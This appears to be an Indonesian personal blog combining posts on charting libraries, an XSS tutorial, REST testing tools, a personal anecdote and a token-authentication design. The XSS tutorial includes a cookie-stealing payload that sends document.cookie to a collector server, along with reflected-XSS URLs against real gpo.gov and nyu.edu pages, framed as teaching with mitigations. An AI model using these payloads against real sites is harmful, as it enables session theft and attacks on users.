Ahmad Fathi Hadi

Saya menghabiskan waktu yang cukup lama untuk menentukan Charting Library apa yang harus saya pakai pada project kali ini. Karena dalam menentukan sesuatu yang ingin kita pakai(dalam kasus kali ini yang dimaksud adalah Chart Library dan bukan yang lain) tentunya tidaklah mudah karena setiap orang memiliki selera yang berbeda-beda, serta kemampuan yang berbeda juga. Kemampuan yang saya maksud adalah Skill, Uang dan Waktu. Contohnya saja jika project yang sedang dikerjakan memiliki budget yang besar, maka saya tidak ambil pusing karena saya bisa membeli lisensi charting yang bagus(HighChart contohnya). Namun berbeda ketika budget yang dimiliki tidak banyak, maka kita harus mencari alternatif yang Free.

Posting kali ini bukan bertujuan untuk membahas Uang, atau bahkan tutorial membuat charting, tapi lebih kepada list charting yang bisa anda pilih. Baiklah langsung saja saya list semua Charting dan graphic library yang sudah saya temukan dan kumpulkan link-nya,

• D3.js merupakan Charting dan graphic library yang paling anyar saat ini, namun sangat tidak dianjurkan untuk pemula. Anda bisa lihat Contohnya disini.
• HighChart sangat mudah bagi pemula, namun sayangnya tidak gratis untuk project non-komersil. Jika anda punya budget lebih, silahkan gunakan ini.
• iChartJS made In China, tapi sangat menarik, bagus, dan Gratis. Saya merekomendasikan anda untuk menggunakannya.
• jqPlot simple namun tidak banyak opsi, tapi gratis.
• chartjs merupakan pendatang baru dengan total 6 chart yang sepertinya cukup menarik.
• JIT Mudah dan bagus.
• FusionCharts Bagus, berbayar, mahal, dan saya lebih pilih HighChart jika harus bayar
• dygraphs
• Protovis merupakan cikal bakal dari D3.js
• Dojo Charting cocok untuk pemula
• amcharts berbayar
• Flot Charts, mudah namun tidak begitu lengkap
• Google Chart Tools ide buruk menurut saya jika menggunakan ini
• dc.js dibuat diatas D3
• xcharts bagus dan dibuat diatas D3, namun sayangnya saat ini hanya tersedia Bar Chart dan sejenisnya.
• nvd3 dibangun diatas D3, dengan tujuan memberikan anda kemudahan karena beberapa chart sudah dibuat dan dapat digunakan ulang.
• rickshaw masih diatas D3, namun tidak lengkap
• Cubism.js hanya fokus terhadap Visualisasi Time Series(berdasarkan D3)
• kendoUI Berbayar(Mahal) dan tidak terlalu banyak chart yang disediakan
• jQuery Sparklines merupakan JQuery Plugin untuk membuat small inline charts
• peity sama seperti jQuery Sparklines
• Recline.js
• BonsaiJS merupakan graphic library dan sepertinya ingin menyaingi D3, namun pendekatannya lebih mudah dimengerti jika dibanding D3
• Flotr
• ProtoChart
• Flotr2 cukup menarik
• jQuery-Visualize
• xkcd
• JS Charts merupakan Chart Generator dan versi gratisnya terdapat watermark, jika anda bayar tentunya watermark-nya akan hilang
• PlotKit
• MilkChart dibuat berdasarkan MooTools
• moochart masih Beta
• moowheel
• Raphaël
• table2chart
• Canvas 3D Graph
• TufteGraph membutuhkan JQuery
• ArborJS
• TimePlot
• gRaphael
• ICO
• Elycharts Tampilannya cukup jadul dan tidak segar
• ZingChart berbayar namun cukup advance dan memiliki aplikasi khusus untuk membuat chart, tidak hanya itu, dapat di Export sebagai Flash!
• RGraph
• Bluff
• canvasXpress
• ccchart
• JSXGraph
• Smoothie Charts
• YUI Charts
• Emprise JavaScript Charts
• JavaScript Diagram Builder
• jGraph
• Envision
• Sencha Touch Charts sudah banyak dipakai dan dipercaya oleh banyak perusahaan, namun lisensinya cukup mahal
• Style Chart
• AwesomeChartJS
• Sigma.js Hanya fokus terhadap visualisasi graph(hubungan antar titik) coba tengok sejenak, sample yang diberikan cukup menarik.
• Graphene
• TeeChart berbayar
• GoJS
• Harry Plotter
• JPowered
• dHTMLx
• Timeline

Silahkan pilih sesuai selera, kebutuhan dan budget anda. Namun perlu diingat bahwa kompabilitas sangatlah penting, pastikan Chart atau graphic library yang anda pilih bisa berjalan mulus dan bagus pada IE 6!

Tolong jika ada yang terlewatkan, beritahu saya lewat kolom komentar dibawah.

XSS merupakan salah satu jenis serangan injeksi code (code injection attack). XSS dilakukan oleh penyerang dengan cara memasukkan kode HTML atau client script code lainnya ke suatu situs. Serangan ini akan seolah-olah datang dari situs tersebut. Akibat serangan ini antara lain penyerang dapat mem-bypass keamanan di sisi klien, mendapatkan informasi sensitif, atau menyimpan aplikasi berbahaya.

Penjelasan diatas saya ambil dari Wikipedia, jika anda masih bingung, maka hal yang terbaik adalah dengan memberikan contoh, silahkan copy code ini lalu jalankan.

<?php
session_start();
if(isset($_POST['submit']))
	echo $_POST['comment'].'<br>';
?>
<form action="comment.php" method="post"><textarea name="comment"></textarea>
<input type="submit" name="submit" value="Submit" /></form>

Standard bukan ? Baiklah sekarang coba masukkan code berikut pada comment, lalu submit

<script type="text/javascript">javascript:alert('fathihadi.net');</script>

Anda akan melihat Alert atau PopUp bukan ?(*kecuali anda mematikan javascript pada browser). Pada code awal kita sama sekali tidak memunculkan Alert, melainkan Alert ini masuk melalui User Input. Nah inilah yang disebut XSS, yaitu serangan injeksi script. Bayangkan jika facebook memiliki celah XSS seperti ini, siapapun teman anda yang iseng memasukkan script aneh ada wall post-nya, maka anda akan terganggu setiap kali membuka facebook.

Tentunya tujuan hacker mencoba serangan XSS bukan untuk mengganggu alias iseng, tapi untuk tujuan lain, yaitu mencuri session dan hal lainnya. Lalu bagaimana contohnya dengan XSS, hacker bisa mencuri session ?

Sebagai bukti, silahkan persiapkan satu file php baru, yaitu ‘get_all.php’. Pada skenario kali ini, kita akan mencuri PHPSESSID dari user yang sedang login dan mengirimkannya ke server kita

<?php
$file = 'submitted.txt';
$current = file_get_contents($file);
$current .= json_encode($_GET);
file_put_contents($file, $current);
?>

Perlu diketahui bahwa kita akan mencoba semuanya secara local, saya hanya memberikan bukti secara konsep. Dan pada serangan yang sesungguhnya, file get_all.php ini tidak akan berada di localhost, melainkan di hosting sungguhan. Sekarang mari kita coba masukkan code XSS berikut:

<script type="text/javascript">document.write('<img src="http://local.dev:8080/test/get_all.php?w=' + document.cookie + '" style="display:none;">');</script>

Code xss diatas akan membuat sebuah script img yang tidak terlihat, lalu browser akan mengirimkan session cookie ke alamat http://local.dev:8080/test/get_all.php

Berikut contoh PHPSESSID yang terkirimkan,

{"w":"PHPSESSID=3emh390v9sbp23thi2se3onr67"}

Jenis Serangan

Terdapat dua jenis serangan XSS, Persistent dan Non-Persistent. Pada contoh diatas, merupakan jenis serangan Persistent, yaitu serangan yang berupa permanen, karena script xss disimpan kedalam database atau secondary storage, dan setiap korban yang membuka halaman yang sudah terinfeksi akan terkena dampaknya juga. Sedangkan pada serangan Non-Persistent membutuhkan aktifitas social oleh si penyerang kepada calon korban, dan bersifat sementara(tidak permanen), Contohnya saya temukan pada situs Printing Office pemerintahan US.

http://www.gpo.gov/gpo/sitesearch/homedosite.action;jsessionid=gJhsRDgT5D1nG53Pv22Q2DPPv5Z29yBnZcLLYhVyFybv1Nnt6R7F!-1342791787?st=%22%3E%3Cimg%20src=%22https://fbcdn-sphotos-h-a.akamaihd.net/hphotos-ak-ash4/2698_69277572409_2578789_n.jpg%22%3E

Dan

http://google.nyu.edu/search?site=NYUWeb_Main&client=NYUWeb_Main&output=xml_no_dtd&proxyreload=1&proxystylesheet=stern_frontend&sitesearch=www.stern.nyu.edu&q=%22%3E%3Cimg+src%3D%22https%3A%2F%2Ffbcdn-sphotos-h-a.akamaihd.net/hphotos-ak-ash4/2698_69277572409_2578789_n.jpg%22%3E&x=8&y=6

Link diatas bisa dengan mudah saya pendekkan dengan menggunakan tinyurl service seperti bit.ly dan mengirimkannya kepada calon korban. Sekali lagi jangan bingung, karena contoh diatas hanya untuk pembuktian, dan Hacker bisa melakukan hal lain selain menaruh gambar.
Sekarang, bagaimana caranya kita mengetahui bahwa program yang kita tulis sudah benar-benar aman dari XSS ? Anda bisa mencobanya langsung dengan melakukan test satu persatu code XSS dari RSnake XSS cheatsheet dan HTML5 XSS cheatsheet.

Solusi

Jika anda terbiasa menggunakan htmlspecialchars(), maka sepertinya anda harus berfikir ulang, karena fungsi ‘htmlspecialchars’ tidaklah cukup untuk melakukan escaping. Menurut OWASP(Open Web Application Security Project), escaping untuk HTML seharusnya adalah sebagai berikut,

& --> &
< --> &lt;
> --> &gt;
" --> &quot;
' --> &#x27;     &apos; tidak disarankan karena bukan merupakan bagian dari spesifikasi HTML (Lihat: section 24.4.1) &apos; merupakan bagian dari spesifikasi XML dan XHTML.
/ --> &#x2F;     forward slash juga harus diescape

Selain itu, tidak hanya HTML Entity saja yang harus diescape, melainkan HTML Attribute, URL, JavaScript, dan CSS Hex.

Jelas bahwa ‘htmlspecialchars’ saja tidak cukup. Saya akan membuat post lain yang khusus membahas Solusi XSS, mulai dari Escaping hingga Sanitizing.

Namun sebelum mengakhiri posting ini saya ingin menjelaskan mengenai XSS yang berada dalam File Gambar(jpg, png).

Image XSS

XSS Image yang saya maksud bukan berupa tag img pada html seperti,

<img alt="" src="javascript:alert('XSS');" />

Melainkan file Image seperti JPG, atau PNG. Anda mungkin bertanya, bagaimana mungkin file image bisa mengandung XSS?. Bisa!, anda bisa coba sendiri untuk membuka gambar apapun dengan Notepad atau HexEditor, lalu menghapus semuanya dan menggantikannya dengan XSS Code(atau ditambahkan diakhir).

Masalah ini sebenarnya hanya terjadi pada Internet Explorer versi 7 kebawah dan tidak dimiliki oleh Browser modern seperti Chrome dan Firefox, namun tetap kita harus menghindari masalah ini.

Berikut Tips untuk Image XSS :

• Jangan simpan gambar pada domain yang sama dengan web, misalnya jika aplikasi web anda adalah ‘fathihadi.net’, maka simpan semua gambar di subdomain atau domain lain, misalnya ‘images.fathihadi.net’. Hal ini untuk melindungi pencurian cookie. PERHATIAN : Tips ini tidak menyelesaikan masalah !
• Blok semua penggunaan Image. Tentunya tidak mungkin anda lakukan, jadi lupakan tips ini!
• Gunakan Fungsi Manipulasi Gambar sebelum menyimpan gambar. Misalnya mengubah ukuran atau mengkompres Gambar. Ini merupakan cara paling ampuh.

Memang merepotkan bukan ? ini semua disebabkan oleh IE yang terlalu pintar karena mengeksekusi kode html dan javascript yang berapa dalam Image.

Semoga dengan membaca post ini anda bisa mendapatkan banyak gambaran mengenai Web Application Security. Post selanjutnya akan saya bahas solusinya secara mendalam

Jika anda sedang bermain-main dengan REST API, pasti anda membutuhkan sebuah applikasi untuk  mencobanya. Saya sangat menyarankan untuk menggunakan extension/addons pada browser karena akan memudahkan anda untuk mengintip dokumentasi API tersebut, yang biasanya juga diakses menggunakan browser. Saya sudah mencoba berbagai extension/addons pada browser untuk tujuan REST API Testing, dan menemukan banyak bugs pada beberapa extension/addons. Sehingga saya ingin berbaik hati untuk sharing REST API extension/addons yang well tested.

Chrome

Rest Console

Firefox

Rest Client

Dua itu yang sudah saya test dan cukup baik dan stabil, yang lain banyak bugs dan tidak stabil.

Btw jika anda terbiasa dengan console, silahkan gunakan cURL

Happy Exploring

Dua minggu sekali Pak hasan biasanya selalu datang kerumah membawa beberapa Ayam Kampung hidup untuk di potong dirumah saya.

Pak hasan tinggal di depok, dia berumur 75 tahun dengan kesehatan yang MasyaAllah semoga diberikan panjang umur dan berkah atas umur dan kesehatannya, hal ini terbukti dengan kendaraan yang ia gunakan dari depok ke rumah saya yang berada di salemba, yaitu Sepeda.

Iya betul, pak hasan dengan sepeda-nya serta keranjang ayamnya yang diikat dibelakang sepedanya, datang dari depok. Bayangkan saja seumuran pak hasan ini jauh-jauh berangkat dari depok mengayuhkan sepeda untuk menjual ayam, tidak perduli hujan atau panas.

Tentunya dia sudah punya anak dan cucu. Lalu apa alasan pak hasan masih bekerja dengan menjual ayam kampung kerumah rumah ? bukan karena anak-anaknya yang sudah berkeluarga pastinya, tapi karena Pak hasan mempunyai istri yang terkena gangguan jiwa, sebab cintanya ini dia tetap merawat istrinya, dan membutuhkan uang. ketika ditanya kenapa tidak menaruh saja istrinya dirumah sakit jiwa, dia menjawab bahwa dia yakin bahwa dia masih sanggup merawat istrinya.

Hari ini saya lebih terharu ketika ibu saya bertanya mengenai kabar istrinya, berikut ucapan pak hasan yang tidak saya ubah karena baru berselang 15 menit yang lalu. “Ya gitu deh madam, masih belum berubah sakit jiwanya. Abis gimana yah, saya suka sedih kalau ke acara nikahan, gak sama istri saya gak enak madam, biasanya kita berdua, sekarang saya sendiri, gak enak madam”.

Mendengar jawaban tulusnya, saya terdiam dan sangat terharu, ternyata masih ada kesetian hari ini. Walaupun istrinya sakit jiwa, tapi cintanya tidak berubah. Sungguh berbeda dengan para muda mudi jaman ini, dimana kesetiaan sudah susah untuk ditemukan.

Karena kesetian perlu pembuktian dan pengorbanan, bukan hanya sekedar kata-kata manis.

Latar belakang

Saat ini saya tengah mengembangkan sebuah API(REST API) untuk moderasi konten digital seperti pada website, forum, dan sebagainya. Namun saya sadar bahwa keamanan(security) adalah hal yang amat penting dan krusial bagi semua pihak.

Akhirnya saya mulai mempelajari mekanisme security yang ada dan sudah umum di gunakan untuk API, hinggal akhirnya saya menemukan OAuth 1 dan OAuth 2. Pada saat ini OAuth 2 masih berupa draft dan belum resmi, namun kita bisa mempelajari konsepnya. Setelah membandingkan dan mencoba sendiri security OAuth 2, ternyata menurut saya tidak aman karena token bisa digunakan dimanapun dan berkali-kali. Kelebihan OAuth 2 adalah tidak begitu kompleks dan rumit seperti OAuth 1, namun seperti yang sudah saya jelaskan sebelumnya bahwa OAuth 2 masih berupa draft dan tidak aman(saya sudah membuktikannya). Anda bisa membaca link ini sebagai bahan bacaan dan pertimbangan tambahan http://hueniverse.com/2012/07/oauth-2-0-and-the-road-to-hell/

Sedangkan untuk OAuth 1, saya sudah mencoba dan memang cukup secure secara konsep dan implementasinya dan juga sudah dipakai oleh industry selama ini. Namun perlu diingat bahwa OAuth 1 dan OAuth 2 pada awalnya dirancang untuk konsep 3 Legged connection. Sehingga token akan menjadi sia-sia jika anda menggunakan konsep 2 legged. Bukan berarti OAuth 1 tidak mensuport 2 legged connection, namun hal ini akan sangat over kill. Jika anda menggunakan OAuth 1, pasti anda akan merasakan betapa kompleksnya aturan-aturan yang ada. Saya juga sudah mencoba beberapa OAuth library(official), dan saya cukup kaget ketika menemukan bugs yang hampir ada di semua library yang saya coba, yaitu bugs untuk Array of Array, dimana jika ditemukan variable seperti(Array of Array) ini maka pasti tidak akan masuk kedalam base string yang akan di generate sebagai signature. Ini merupakan bug yang sangat fatal. Saya heran kenapa bug ini tidak ada yang sadar dan membenarkannya dari awal OAuth ada(2008). Anda bisa lihat http://code.google.com/p/oauth-php/issues/detail?id=131

Namun sejauh ini memang OAuth 1 masih menjadi yang terbaik dan terbukti secara industry, aman dari banyak jenis serangan dan security issue, serta bisa digunakan pada HTTP(tidak membutuhkan SSL). Perlu anda ketahui saya menghabiskan waktu hampir 5 hari untuk mengerti konsep OAuth, dikarenakan saya mempelajari dari semua sudut, seperti konsep, security, Code dan implementasinya.

Saya merasa OAuth sangat terlalu kompleks untuk 2 legged connection dan mungkin ada solusi yang lebih mudah dan secure. Oleh karena itu saya menghabiskan waktu 2 hari untuk memikirkan alternative dan cara yang paling cocok untuk mekanisme 2 legged.

Masalah

OAuth 1 sangat kompleks untuk mekanisme 2 legged

Tujuan Penulisan

Karena melihat permasalahan yang ada, maka saya merancang konsep Flat Token Authentication dengan harapan tidak kompleks namun secure.

Pembatasan Masalah

Kali ini masalah akan dibatasi seputar konsep, keamanan dan kelayakan pada metode Flat Token Authentication. Serta konsep akan dibatasi hanya untuk 2 legged connection. Namun tidak menutup kemungkinan konsep ini bisa digunakan pada 3 legged atau n legged connection.

Catatan Awal

Sekali lagi saya ingin menyatakan bahwa tujuan saya adalah mencari alternative, dan meminta bantuan public untuk menilai dan memberikan masukan untuk solusi yang saya rancang, apakah layak atau tidak.

2 Legged Connection

Spec

1. API Server must use SSL
2. Public Key and Private Key
3. One Way Hash using SHA512
4. Token Signature using HMAC(SHA512 and Private Key)
5. One Time Token Expire

Untuk memangkas kompleksitas pada OAuth 1, serta memberikan level security maka API Server harus menggunakan SSL.

Konsep Flat Token Authentication membagi akses client terharap server menjadi dua bagian.

1. Client mengirimkan data atau action/perintah terhadap server (Contoh : client memberikan perintah untuk menghapus salah satu data user.)

2. Client meminta data dari server (Contoh : Client meminta data semua usernya.)

Karena menggunakan SSL, maka bisa dijamin koneksi dari Client ke Server tidak bisa di spoof. Namun tidak sebaliknya jika Server yang memulai koneksi ke client.

Client dan Server harus memiliki Public key dan Private key. Private key haruslah rahasia dan hanya di ketahui oleh Server dan Client. Sedangkan Public key bisa di ketahui oleh siapa saja.

Untuk hash pada saat verifikasi token, diharuskan menggunakan sha512.

Penandatanganan hanya dilakukan terhadap TOKEN yang di kirim oleh server ke Client. Konsep Flat Token Authentication tidak mengenal data signature karena sudah menggunakan SSL.

Skenario 1, Client mengirimkan data :

1. [Client] mengirim data user barunya terhadap [Server]
2. [Server] membalas dengan sebuah random token yang akan expire jika token tersebut sudah di konfirmasi oleh [Client]. Pada saat ini Server tidak akan menyimpan data user sebelum [Client] melakukan konfirmasi. Jika konfirmasi berhasil maupun gagal, maka token akan dibuang dan tidak dapat digunakan lagi oleh pihak manapun.
3. [Client] harus melakukan konfirmasi dengan cara menandatangani token tersebut dengan HMAC menggunakan Private Key yang dimiliki, lalu mengirimkannya ke [Server].
4. [Server] menerima signature baru tersebut dan mengeceknya dengan cara yang sama, yaitu menandatangani dengan cara HMAC(SHA512) menggunakan Private key. Jika valid, maka data user akan dimasukkan, jika tidak maka bisa dipastikan request data user tersebut dilakukan oleh Attacker.

Perlu diketahui bahwa point 1 dan 2 terlindungi dari penyadapan karena melalui HTTPS. Namun yang menjadi permasalahan adalah Penyerang bisa saja mengetahui public key dan melakukan request terhadap server. Oleh karena itu Server mengirimkan token dan seakan-akan mempercayai data yang dikirim tersebut. Namun tentunya Penyerang tidak bisa melakukan konfirmasi karena tidak mengetahui Private Key. Mari lihat Ilustrasi dibawah ini

Skenario 2, Client meminta data :

1. [Client] meminta data semua Usernya ke [Server]
2. [Server] membalas dengan sebuah token yang akan ditukar dengan data jika sudah di konfirmasi oleh [Client].
3. [Client] menandatangani token tersebut dengan HMAC(SHA512) menggunakan Private Key yang dimilikinya dan mengimkan konfirmasi tersebut ke [Server].
4. [Server] menerima konfirmasi tersebut dan melakukan pengecekan dengan cara yang sama, yaitu tandangan token dengan HMAC(SHA512) menggunakan Private Key, jika sama maka [Server] akan membalas dengan Data yang diminta. Setelah itu token pasti akan expire.

Dengan konsep yang sama, yaitu Server menahan untuk memberikan data, dan hanya memberikan token. Jika token berhasil di konfirmasi, maka token itu bisa ditukan dengan data yang diminta. Semua koneksi aman dari penyadapan dan pengubahan data karena melalui HTTPS.

Kekurangan utama dari system ini adalah dibutuhkan +1 connection or API Call untuk konfirmasi token. Namun hal ini sebanding dengan pengurangan drastis dari kerumitan ketika menggunakan OAuth v1.

Saya mohon lihat dan teliti segala celah. Masukan akan sangat berarti bagi saya untuk bisa memperbaiki konsep ini. Jika ternyata konsep ini tidak layak maka saya akan senang hati J. Jika anda tertarik untuk mengembangkannya bersama saya, maka kita bisa membuat working group seperti apa yang dilakukan OAuth selama ini.

Feedback bisa dikirimkan langsung pada comment di blog ini atau email  ke ahmadfathihadi [ at ] gmail.com dan cc ke ahmad [ at ] tandif.com.

Saya bisa dihubungi di +62 81 808 49 7749